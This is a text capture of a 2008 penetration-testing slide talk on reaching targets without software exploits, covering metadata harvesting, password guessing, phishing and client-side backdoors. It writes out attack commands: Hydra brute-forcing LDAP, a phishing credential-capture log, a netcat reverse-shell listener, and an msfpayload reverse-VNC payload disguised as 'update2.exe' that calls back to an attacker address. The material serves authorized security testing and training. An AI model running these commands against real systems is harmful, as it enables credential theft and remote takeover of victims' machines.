beyond front-line exploits
TRANSCRIPT
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 1/44
Beyond Front-Line Exploits:Tips and Tools for Comprehensive
Penetration Testing
Lenny ZeltserSecurity Consultant, SAVVIS
Senior Faculty Member, SANS Institute
Handler, SANS Internet Storm Center
August 2008
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 2/44
Pen testing usually involves locating
and exploiting software bugs.
2© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 3/44
Attack surface of many server
environments is very limited.
What if you couldn’texploit any software
vulnerabilities?
3© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 4/44
Consider 4 techniques for going
beyond the front-line approach.
Data in plain sight
Remote password-guessing
Social engineering
Client-sidebackdoors
4
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 5/44
#1: Data in plain sight
5
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 6/44
© 2008 Lenny Zeltser6
site:example.com filetype:pdf
site:example.com filetype:ppt
site:example.com filetype:doc
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 7/447
© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 8/44
libextractor
$ extract sample.pdf sample.ppt sample.doc
$ extract overview.pptparagraph count - 2
last saved by - Lenny Zeltser
title - Project overview
creation date - 2008-03-14T01:58:53Z
creator - John Smith
word count - 5
date - 2008-03-14T04:56:57Z
generator - Microsoft Office PowerPoint
8© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 9/44
9© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 10/44
Google + libextractor = Metagoofil
$ metagoofil.py -d example.com -f all -l 10 –o o.html –t o
10© 2008 Lenny Zeltser
$ metagoofil.py -d zeltser.com -f all -l 10 –o o.html –t o
[+] Searching in zeltser.com for: pdf
[+] Total results in google: 11
[ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf
[ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf
...
[+] Searching results: 0
[ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt
Usernames found:
================
Lenny Zeltser (www.zeltser.com)
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 11/44
Finding documents via Maltego
© 2008 Lenny Zeltser11
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 12/44
Finding interesting files via Maltego
© 2008 Lenny Zeltser12
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 13/44
#2: Remote Password-Guessing
13
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 14/44
Potential usernames: rankedword lists
© 2008 Lenny Zeltser14
http://www.census.gov/genealogy/names/names_files.html
Top Last Names Top Female First
Names
Top Male First
Namessmith mary james
johnson patricia john
williams linda robert
jones barbara michael
brown elizabeth william
davis jennifer david
miller maria richard
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 15/44
Potential usernames: theHarvester
$ theHarvester.py -d example.com –l 3 -b google
$ theHarvester.py -d example.com –l 3 -b linkedin
Mark Jameson
James Quieras
Robert Marcus
$ theHarvester.py -d example.com –l 3 -b pgp
15© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 16/44
Wrong username vs. password
© 2008 Lenny Zeltser16
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 17/44
Confirm usernames w ith Brutus byvarying only usernames.
OneMany
17© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 18/44
A head-on brute-force passwordattack w ill probably fail.
© 2008 Lenny Zeltser18
Create a short list of potential passwords.
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 19/44
Some common generic passwords
password baseball1 iloveyou querty1 soccer
password1 football1 iloveyou1 querty123 windows
abc123 123456 monkey bitch1 1qaz2wsx
123abc 123123 cookie123 flower gospel
fuckyou monkey1 miss4you 123qwe superman
1
fuckyou1 princess1 clumsy manager admin
19© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 20/44
Best results w ith a company-specific dictionary file
Briefly
Britain
British
brother
browser
Bugtraq
Bugbearbundled
20© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 21/44
Password recovery mechanisms areweak links.
© 2008 Lenny Zeltser21
They often depend on securityof the email system.
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 22/44
Also, “secret question” recovery is aprime candidate for attack.
22© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 23/44
Letting users select their ownquestions is particularly weak.
23© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 24/44
Use LDAP if you find it—much fasterauthentication.
$ hydra -L users.txt –P passwords.txt ldap.example.com ldap2
Hydra v5.4 (c) 2006 by van Hauser / THC
Hydra (http://www.thc.org) 15 tasks, 26753 login tries
[DATA] attacking service ldap2 on port 389
[389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example
password: Bugbear
$ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*'
-h ldap.example.com
24© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 25/44
Brute-force Remote Desktopcredentials w ith TSGrinder.
25© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 26/44
TSGrinder is slow , and requires anolder Remote Desktop client (v5).
26© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 27/44
#3: Social engineering
27
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 28/44
Tricking employees to releaseinformation works too well.
28© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 29/44
Email phishing-style campaigns canobtain logon credentials.
29© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 30/44
ArGoSoft Mail Server Freewarehelps relay spoofed email.
30© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 31/44
You can register a domain thatresembles that of the target.
http://www.domaintools.com/domain-typo
xeample.com
eaxmple.com
exampe.net
exapmle.com
eaxmple.com
wwwexample.com
exampel.com
31© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 32/44
Too many users will give up theirlogon credentials.
32© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 33/44
The site can also capture client-sidedetails for follow-on attacks.
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;
33© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 34/44
#4: Client-Side Backdoors
34
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 35/44
Keeping up w ith security patches onlaptops and desktops is hard.
35© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 36/44
Tools such as Core Impact andMetasploit help target client-side
vulnerabilities.
36© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 37/44
I t may be more effective just to askthe user to install the backdoor.
37© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 38/44
The backdoor can connect to theattacking system via reverse-shell.
38© 2008 Lenny Zeltser
$ C:\attacker> nc -l -p 80
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rightsreserved
C:\Windows\Temp> dir
...
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 39/44
Metasploit can generate stand-alonepayloads. Example: Reverse-VNC.
© 2008 Lenny Zeltser39
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544
LHOST=192.168.1.124 DisableCourtesyShell=True X >update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177Options: LHOST=192.168.1.124,LPORT=5544,
DisableCourtesyShell=True
$ msfcli exploit/multi/handler LPORT=5544
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 40/44
Reverse-VNC can control a systemeven if it is behind a firewall.
40© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 41/44
A system compromiseis just a means to an end.
© 2008 Lenny Zeltser41
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 42/44
Consider previous scenarios whendefining your rules of engagement.
42© 2008 Lenny Zeltser
8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 43/44
These approaches increase thechances of a “successful” pen test.
43© 2008 Lenny Zeltser
Data in plain sight
Remote password-guessing
Social engineering
Client-sidebackdoors